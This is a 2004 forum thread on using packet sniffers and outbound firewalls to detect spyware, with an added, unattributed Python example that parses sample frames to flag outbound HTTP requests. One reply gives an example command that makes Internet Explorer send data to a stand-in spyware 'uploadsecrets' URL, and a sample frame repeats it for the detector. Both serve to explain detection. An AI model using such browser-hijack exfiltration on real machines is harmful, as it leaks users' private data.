Fog Creek Software
Discussion Board

Packet Sniffing Software

MarkTaw.com suggested in an earlier thread to use packet sniffing software to spot spyware.

Would anyone have a pointer for one to use on a WinXP machine?

I am pretty ignorant on the packet and TCP/IP side of things - I would like to learn more. Would packet sniffing software allow the user to monitor packets being sent?

Ram Dass
Sunday, January 18, 2004

If you want to stop spyware, my suggestion would be not to use a packet sniffer (which is complicated, and not as useful as it might sound at first unless you're really well versed in network protocols), but rather use a firewall that protects outbound as well as inbound. ZoneAlarm is one example of such a firewall.

Brad Wilson (dotnetguy.techieswithcats.com)
Sunday, January 18, 2004

Ethereal has a Windows port that is easy to install.

SG
Sunday, January 18, 2004

Yup, just install a firewall, and set it up so that a dialog pops up every time an application wants to connect out. FWIW, I use Kerio Personal Firewall, free for personal use.

FredF
Sunday, January 18, 2004

tcpdump works on Windows.

Tom Vu
Sunday, January 18, 2004

The other suggestions work pretty well, but here's an easy, free GUI tool:

http://www.networkactiv.com/PIAFCTM.html

I used it recently and was pretty happy with it, although it's not for the 133+ crowd.

Lee
Sunday, January 18, 2004

Ethereal. It's free and it works great. I use it all the time, I used it earlier today.

http://www.ethereal.com/

www.MarkTAW.com
Sunday, January 18, 2004

Local firewalls are operationally challenged.  Sure, they intercept outgoing connections and compare to a white/prompt/black list etc.

However, this is trivial for spyware and malware to overcome.  They can subvert a surely trusted app, i.e. IE, and make it go submit your dirty secrets on their behalf.

"C:\Program Files\Internet Explorer\IExplore" "http://www.spware.central.com/uploadsecrets?uid=blah&open=blah&blah.."

i like i
Monday, January 19, 2004
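An added example, not from any poster in this thread, of what a sniffer such as Ethereal or tcpdump shows that a per-application firewall prompt does not: it decodes a few constructed Ethernet/IPv4/TCP frames and lists the outbound HTTP requests and how many bytes their query strings carry, whichever process issued them. All addresses, hostnames and frames are constructed sample data, not a real capture.

```python
import struct
from ipaddress import ip_address
from urllib.parse import urlsplit

def build_frame(src, sport, dst, dport, payload):
    """Construct a minimal Ethernet/IPv4/TCP frame as sample data (checksums left zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                         6, 0, ip_address(src).packed, ip_address(dst).packed)  # 6 = TCP
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return b"\x00" * 12 + struct.pack("!H", 0x0800) + ip_hdr + tcp_hdr + payload  # 0x0800 = IPv4

def parse_frame(frame):
    """Decode Ethernet II + IPv4 + TCP headers; return (src, sport, dst, dport, payload) or None."""
    if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None
    ip = frame[14:]
    ihl, total = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:
        return None
    src, dst = str(ip_address(ip[12:16])), str(ip_address(ip[16:20]))
    tcp = ip[ihl:total]                      # TCP segment, trimmed to the IP total length
    sport, dport = struct.unpack("!HH", tcp[:4])
    return src, sport, dst, dport, tcp[(tcp[12] >> 4) * 4:]

def outbound_http_requests(frames, local_ip):
    """List HTTP requests leaving local_ip; the wire shows them whichever process sent them."""
    found = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None or parsed[0] != local_ip:
            continue                          # not IPv4/TCP, or traffic coming back in
        _, _, dst, dport, payload = parsed
        parts = payload.split(b"\r\n", 1)[0].decode("ascii", "replace").split(" ")
        if len(parts) != 3 or not parts[2].startswith("HTTP/"):
            continue                          # not an HTTP request line
        found.append({"dst": f"{dst}:{dport}", "method": parts[0],
                      "path": urlsplit(parts[1]).path,
                      "query_bytes": len(urlsplit(parts[1]).query)})
    return found

# Constructed sample traffic: a normal page fetch, a request whose query string carries data out, a reply.
SAMPLE_FRAMES = [
    build_frame("192.168.1.10", 1025, "203.0.113.5", 80,
                b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    build_frame("192.168.1.10", 1026, "203.0.113.9", 80,
                b"GET /uploadsecrets?uid=blah&open=blah&blah=" + b"A" * 300
                + b" HTTP/1.1\r\nHost: spyware.example\r\n\r\n"),
    build_frame("203.0.113.5", 80, "192.168.1.10", 1025, b"HTTP/1.1 200 OK\r\n\r\n"),
]
```

Calling `outbound_http_requests(SAMPLE_FRAMES, "192.168.1.10")` returns the two outbound requests only; the second shows up with a 324-byte query string, which is the kind of thing to look at more closely regardless of which program sent it.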

I would recommend ethereal, programs like Norton Internet Security and Zone Lab's ZoneAlarm, as well as the following URL:

http://www.ece.vt.edu/network/network-tools.zip

Desc: A quick investigative toolkit compiled by the Electrical & Computer Engineering, Departmental Network Information

Most executables come from www.sysinternals.com; handle.exe in particular is of interest to most users because it shows you which program is running and what files or pipes the programs are holding on to.

A word of caution, I have this nagging feeling that most modern trojans depend on "rootkit" libraries capable of pretty much completely hiding themselves from sight on NT5.0+ servers, and they are updated so often that they won't show up on an antivirus detection anytime soon.

Li-fan Chen
Monday, January 19, 2004

another vote for ethereal, it's easy to use and _very_ easy to install (as long as you follow the instructions :)

FullNameRequired
Monday, January 19, 2004

There's also an ActiveX Packet Sniffer around, called PacketX.

Indian Developer in India
Monday, January 19, 2004

Another plug for Ethereal (anyone else notice, though, that the recent version seems a bit buggier with the new UI?)

I must point out (if you haven't seen it already) the program Ad-aware at http://www.lavasoftusa.com/ . It scans the registry, memory, and disk for spyware signatures. Quite good at what it does.

-Rich

Rich
Tuesday, January 20, 2004
